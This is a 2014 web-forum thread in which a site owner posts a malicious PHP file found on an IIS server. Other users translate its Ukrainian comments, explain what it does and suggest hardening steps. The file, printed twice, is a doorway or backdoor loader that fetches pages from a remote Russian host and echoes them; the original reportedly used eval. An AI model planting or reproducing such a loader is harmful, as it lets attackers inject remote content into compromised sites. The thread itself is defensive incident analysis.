Page 1 of 1

suspicious php file present on our server

Posted: Sun Oct 19, 2014 11:36 pm
by p_s_92
There is a file called index.php which got loaded on our server. The code inside the PHP(below) seems malicious

Code: Select all

$key = array_search('', $_GET); if ($key == 'test') { $url_server = "http://fbschool.ru/door/test1.ru"."/".$key.".php"; } else { $url_server = "http://fbschool.ru/door/".str_replace('www.', '', $_SERVER[ 'SERVER_NAME' ])."/".$key.".php"; } //перевірка на то чи існує файл дора $Headers = @get_headers($url_server); if(strpos($Headers[0], '200')) { function get_curl ($url, $n) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $content); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 600); if ($n==0){ curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);} $output = curl_exec ($ch); curl_close ($ch); return $output; } function get_fsockopen ($url, $n) { $post=""; $u = parse_url($url); if( $fp = fsockopen($u['host'],!empty($u['port']) ? $u['port'] : 80 )){ $headers = 'POST '. $u['path'] .' HTTP/1.0'. "\r\n"; $headers .= 'Host: '. $u['host'] ."\r\n"; if ($n==0){ $headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; } $headers .= 'Content-type: text/html' . "\r\n"; $headers .= 'Content-length: ' . strlen($post) . "\r\n"; $headers .= 'Connection: Close' . "\r\n\r\n"; $headers .= $post; fwrite($fp, $headers); $ret = ''; while( !feof($fp) ){ $ret .= fgets($fp,1024); } $html = substr($ret,strpos($ret,"\r\n\r\n") + 4); fclose($fp); } return $html; } if( function_exists("curl_init") ) { //берем сторінку дора $page_host = get_curl($url_server, 0); $page_host_arr = explode("\r\n", $page_host); for ($i=4;$i<=count($page_host_arr);$i++) $page_host_tmp .= $page_host_arr[$i]."\r\n"; //берем сторінку шелла $page = get_curl($page_host_arr[0], 1); } else { $page_host = get_fsockopen($url_server, 0); $page_host_arr = explode("\r\n", $page_host); for ($i=4;$i<=count($page_host_arr);$i++) $page_host_tmp .= $page_host_arr[$i]."\r\n"; $page = get_fsockopen($page_host_arr[0], 1); } //вирізаємо всі непотрібні теги $page = preg_replace('//i', '', $page); $page = preg_replace('//i', '', $page); $page = preg_replace('//i', '', $page); $page = preg_replace('/ ", $page, 1); //вставка контенту $page = preg_replace('//', " $page_host_tmp", $page, 1); echo $page; exit; } 
I do not know if it is attempting to sell some unwanted spam products or open a backdoor as I did not want to infect my computer. I used http://global.sitesafety.trendmicro.com/result.php to check the link http://fbschool.ru/door/test1.ru but did not find any information.

What steps should I take?

Any advice would be appreciated.

Re: suspicious php file present on our server

Posted: Mon Oct 20, 2014 12:11 am
by requinix
Is it your own file? No? Then it shouldn't be there. Period.

Check the modification date on the file, then look through your access logs for an indication as to how they got it on your server.

Re: suspicious php file present on our server

Posted: Mon Oct 20, 2014 9:36 pm
by p_s_92
Thanks requinix,

It is not our file. Which access logs do I need to check? We are running Win 2008 with IIS. Our server admin does not have time for these tasks.

Re: suspicious php file present on our server

Posted: Mon Oct 20, 2014 10:44 pm
by requinix
If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.

IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.

Re: suspicious php file present on our server

Posted: Thu Oct 23, 2014 8:08 pm
by Weirdan
Sidenote: The comments in the code are in Ukrainian. Interesting.

Re: suspicious php file present on our server

Posted: Thu Oct 23, 2014 10:14 pm
by p_s_92
Thanks requinix,
requinix wrote:If your admin "does not have time" to investigate an intrusion into a server he manages then you have a second problem to deal with.
Agreed, but lot of times you don't have a choice and have to tolerate whoever manages the servers.
requinix wrote: IIS should be configured to record access (web page, AJAX requests, etc.) to a log file. You might have to go through the IIS configuration to find out where it is, though the IIS installation directory would be a good place to check first.
Thanks, I will check that out. Are there any guides which explain how to lock down a IIS server, scan for PHP vulnerabilities etc?

I appreciate your time and assistance with this thread.

Re: suspicious php file present on our server

Posted: Thu Oct 23, 2014 10:17 pm
by p_s_92
Thanks Weirdan,
Weirdan wrote:Sidenote: The comments in the code are in Ukrainian. Interesting.
Can you please tell us what they mean?

It appears the code tries to open a file from some remote server and then open a socket.

I do not know if it is attempting to sell some unwanted spam products or open a backdoor

Re: suspicious php file present on our server

Posted: Fri Oct 24, 2014 8:12 pm
by Weirdan
Sure. Translator notes in square brackets (also formatted code a bit to make it easier to read):

Code: Select all

<?php
$key = array_search('', $_GET); 
if ($key == 'test') { 
	$url_server = "http://fbschool.ru/door/test1.ru" . "/" . $key . ".php"; 
} else { 
	$url_server = "http://fbschool.ru/door/" . str_replace('www.', '', $_SERVER['SERVER_NAME']) . "/" . $key . ".php"; 
} 

// перевірка на то чи існує файл дора 
// checking if the door [backdoor or doorway?] file exists
$Headers = @get_headers($url_server); 

if (strpos($Headers[0], '200')) { 

	function get_curl($url, $n) { 
		$ch = curl_init($url); 
		curl_setopt($ch, CURLOPT_POST, true); 
		curl_setopt($ch, CURLOPT_POSTFIELDS, $content); 
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); 
		curl_setopt($ch, CURLOPT_TIMEOUT, 600); 
		if ($n == 0) { 
			curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
		} 
		$output = curl_exec ($ch); 
		curl_close($ch); 
		return $output; 
	} 

	function get_fsockopen($url, $n) { 
		$post = ""; 
		$u = parse_url($url); 
		if ($fp = fsockopen($u['host'], !empty($u['port']) ? $u['port'] : 80)) { 

			$headers = 'POST ' . $u['path'] . ' HTTP/1.0' . "\r\n"; 
			$headers .= 'Host: ' . $u['host'] . "\r\n"; 
			if ($n == 0) { 
				$headers .= 'User-Agent: ' . $_SERVER['HTTP_USER_AGENT'] . "\r\n"; 
			} 
			$headers .= 'Content-type: text/html' . "\r\n"; 
			$headers .= 'Content-length: ' . strlen($post) . "\r\n"; 
			$headers .= 'Connection: Close' . "\r\n\r\n"; 
			$headers .= $post; 
			fwrite($fp, $headers); 

			$ret = ''; 
			while (!feof($fp)) { 
				$ret .= fgets($fp, 1024); 
			} 
			$html = substr($ret, strpos($ret, "\r\n\r\n") + 4); 
			fclose($fp); 
		} 
		return $html; 
	} 
	if (function_exists("curl_init")) { 
		// берем сторінку дора 
		// getting the door [see note above] page
		$page_host = get_curl($url_server, 0); 
		$page_host_arr = explode("\r\n", $page_host); 
		for ($i = 4; $i <= count($page_host_arr); $i++) 
			$page_host_tmp .= $page_host_arr[$i] . "\r\n"; 

		// берем сторінку шелла 
		// getting the shell page
		$page = get_curl($page_host_arr[0], 1); 
	} else { 
		$page_host = get_fsockopen($url_server, 0); 
		$page_host_arr = explode("\r\n", $page_host); 
		for ($i = 4; $i <= count($page_host_arr); $i++) 
			$page_host_tmp .= $page_host_arr[$i] . "\r\n"; 
		$page = get_fsockopen($page_host_arr[0], 1); 
	} 
	// вирізаємо всі непотрібні теги 
	// removing unnecessary tags
	$page = preg_replace('//i', '', $page); 
	$page = preg_replace('//i', '', $page); 
	$page = preg_replace('//i', '', $page); 
	$page = preg_replace('/ ", $page, 1); // [syntax error here]
	// вставка контенту 
	// inserting content
	$page = preg_replace('//', " $page_host_tmp", $page, 1); 
	echo $page; 
	exit; 
} 
The code appears to fetch a newline delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted contains syntax error, and those preg_replace calls seem like they are missing actual regexp (first parameter).

Re: suspicious php file present on our server

Posted: Sat Oct 25, 2014 12:38 am
by p_s_92
Thanks Weirdan,
Weirdan wrote:Sure. Translator notes in square brackets (also formatted code a bit to make it easier to read):
The code appears to fetch a newline delimited file from that server, then use data from it to get another file, which gets echoed. The code as you posted contains syntax error, and those preg_replace calls seem like they are missing actual regexp (first parameter).
The file was using the eval function to evaluate a remotely fetched file using file_get_contents. It seems like a XSS exploit.

I did not want to run the file so used echo instead of eval to know the contents of the remote file being loaded and posted it here.

1. We do not use file_get_contents calls to in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?

2. What are the ways we can lock down the server from running such XSS exploits?

Thanks a lot for your time and advice.

Re: suspicious php file present on our server

Posted: Mon Oct 27, 2014 4:21 am
by Weirdan
p_s_92 wrote: 1. We do not use file_get_contents calls to in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?
You could use disabled_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include
These wouldn't help to prevent execution of the script you posted though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in temp folder, possibly) and do a local include.
2. What are the ways we can lock down the server from running such XSS exploits?
You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for html), filter and validate input, escape input (for sql), disable execution of uploaded files (one could put php code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your ftp passwords, run a virus scan, use sftp instead of ftp, etc).

Re: suspicious php file present on our server

Posted: Sun Nov 02, 2014 10:40 am
by p_s_92
Thanks Weirdan,

I am sorry for the late reply.
Weirdan wrote:
p_s_92 wrote: 1. We do not use file_get_contents calls to in our projects. Is blocking file_get_contents in PHP an option to reduce such risks? If so, how can that be done?
You could use disabled_functions php.ini directive. However, file_get_contents is often used by third-party libraries. There are another two options you may want to disable instead: allow_url_fopen and allow_url_include
These wouldn't help to prevent execution of the script you posted though, as it uses curl and fsockopen. You may want to disable eval(), but even then it would be possible to fetch the script from a remote server, store it somewhere (in temp folder, possibly) and do a local include.
Yes, most ways can be circumvented.
2. What are the ways we can lock down the server from running such XSS exploits?
You need to find out how that file appeared on your server in the first place. Some good general practices are: escape output (for html), filter and validate input, escape input (for sql), disable execution of uploaded files (one could put php code in image EXIF tags, for example), make sure the computer you use to upload your sources to the server is secure (change your ftp passwords, run a virus scan, use sftp instead of ftp, etc).
The server admin did not have time. We are using Mura CMS. He told us that needs to be upgraded and could be the reason how the file got there. We filter and validate input, escape input (for sql). Escape output is something we need to focus on.

1. How do you disable execution of uploaded files (one could put php code in image EXIF tags, for example)?

Thanks a lot for all your time and assistance with this thread.